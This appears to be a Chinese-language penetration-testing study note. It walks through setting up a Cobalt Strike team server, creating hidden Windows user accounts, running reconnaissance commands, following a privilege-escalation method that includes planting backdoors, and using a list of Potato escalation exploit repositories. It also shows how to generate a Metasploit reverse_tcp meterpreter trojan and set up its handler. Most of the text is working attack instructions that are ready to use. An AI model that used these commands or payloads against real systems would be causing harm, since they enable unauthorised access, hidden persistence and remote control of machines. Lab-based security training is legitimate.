一、CS安装
java环境
服务端和客户端都需要java环境
客户端
下载cobaltstrike压缩包并解压
服务端
将server文件夹复制到服务端
二、总结用户组和用户、windows信息搜集命令
1.用户
# 显示所有用户
net user
# 创建用户
net user user1 password1 /add
# 删除用户
net user user1 /del
# 创建隐藏用户
net user user2$ password2 /add
# 删除隐藏用户
net user user2$ /del
2.用户组
# 新建用户组:
net localgroup users /add
# 删除用户组:
net localgroup users /de1
# 添加用户到组:
net localgroup users user1 /add
# 从组中删除用户:
net localgroup users user1 /del
# 普通用户提权:(也即是将用户添加到管理员组中)
net localgroup administrator user1 /add
3.windows信息搜集命令
systeminfo | 打印系统信息 |
whoami | 获取当前用户名 |
whoami /priv | 当前账户权限 |
ipconfig | 网络配置信息 |
ipconfig /displaydns | 显示DNS缓存 |
arp -a | 打印arp表 |
net user | 列出用户 |
net user username | 关于用户的信息 |
net localgroup | 列出所有组 |
net localgroup GROUP | 关于指定组的信息 |
tasklist /svc | 列出进程列表 |
net start | 列出启动的服务 |
ver | 操作系统版本类型 |
三、总结手工提权思路,拿土豆提权
1.手工提权思路
(1)信息收集
系统信息:首先,使用如systeminfo、ver、uname -a(Linux)等命令收集目标系统的基本信息,包括操作系统版本、补丁安装情况、系统架构(32位或64位)、网络配置等。
服务和进程:通过tasklist /svc(Windows)、ps aux(Linux)等命令查看系统上运行的服务和进程,特别注意那些具有潜在提权风险的服务。
用户权限:使用whoami(Windows)、id(Linux)等命令检查当前用户权限,并评估是否足以执行进一步的提权操作。
(2)漏洞扫描与分析
工具扫描:利用Windows-Exploit-Suggester、Linux_Exploit_Suggester等自动化工具,根据收集到的系统信息比对已知漏洞数据库,查找可能存在的未修复漏洞。
手动分析:当自动化工具无法发现漏洞或信息不足时,手动分析系统的:
配置文件(如C:\Windows\System32\drivers\etc\hosts、/etc/passwd、/etc/shadow等)
日志文件(如C:\Windows\System32\winevt\Logs、/var/log)等
寻找可能的提权路径或配置错误。
(3)漏洞利用
筛选EXP:根据漏洞扫描结果,选择与目标系统架构和版本相匹配的EXP。确保EXP的可靠性和稳定性,避免在提权过程中引发安全问题。
上传与执行:将选定的EXP上传到目标系统,可通过网络共享、Web服务器上传、社会工程学等方式实现。执行前,确保EXP的执行环境(如依赖的库、权限要求)已满足,并测试EXP在隔离环境中的表现。
(4)权限提升
执行EXP:在确认环境安全后,执行EXP。如果成功,将获取更高的系统权限。
巩固权限:一旦获得新权限,立即采取措施巩固权限,如创建后门、提升用户权限至管理员级别。
深度搜索:利用新权限探索系统,寻找其他潜在的提权途径或敏感信息。
2.土豆提权
土豆资源
GodPotato
https://github.com/beichendream/godpotato
SweetPotato
https://github.com/ccob/sweetpotato
BadPotato
https://github.com/beichendream/badpotato
RoguePotato
https://github.com/antonioCoco/roguepotato
CandyPotato
https://github.com/klezvirus/candypotato
EfsPotato
https://github.com/zcgonvh/efspotato
MultiPotato
https://github.com/S3cur3Th1sSh1t/MultiPotato
RasmanPotato
https://github.com/crisprss/RasmanPotato
PetitPotato
https://github.com/wh0amitz/PetitPotato
JuicyPotatoNG
https://github.com/antonioCoco/JuicyPotatoNG
PrintNotifyPotato
https://github.com/BeichenDream/PrintNotifyPotato
CoercedPotato
https://github.com/Prepouce/CoercedPotato
四、用CS插件提权
服务端进入Server目录,对teamserver和TeamServerImage文件添加权限
chmod +x teamserver
chmod +x TeamServerImage
成功后文件名后会有*
启动时设置一个服务器ip和密码
./teamserver <ip> <password>
启动后会生成一个端口,这里是50050
客户端打开cs,输入前面设置的ip,密码和生成的端口
在脚本管理器里添加以下插件
创建监听器
生成可执行文件木马,传输到winserver2012中
在虚拟机中双击木马文件,在cs中出现记录,右键选择插件进行提权
提权成功
五、MSF提权
1.安装msf
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && \chmod 755 msfinstall && \./msfinstall
2.启动msf :msfconsole
3.生成木马
msfvenom -p windows/meterpreter/reverse_tcp lhost=server-ip lport=3185 -f exe -o bilmsf.exe
配置参数
use exploit/multi/handler
show options
set payload windows/meterpreter/reverse_tcp
set lport 3185
set lhost server-ip
show options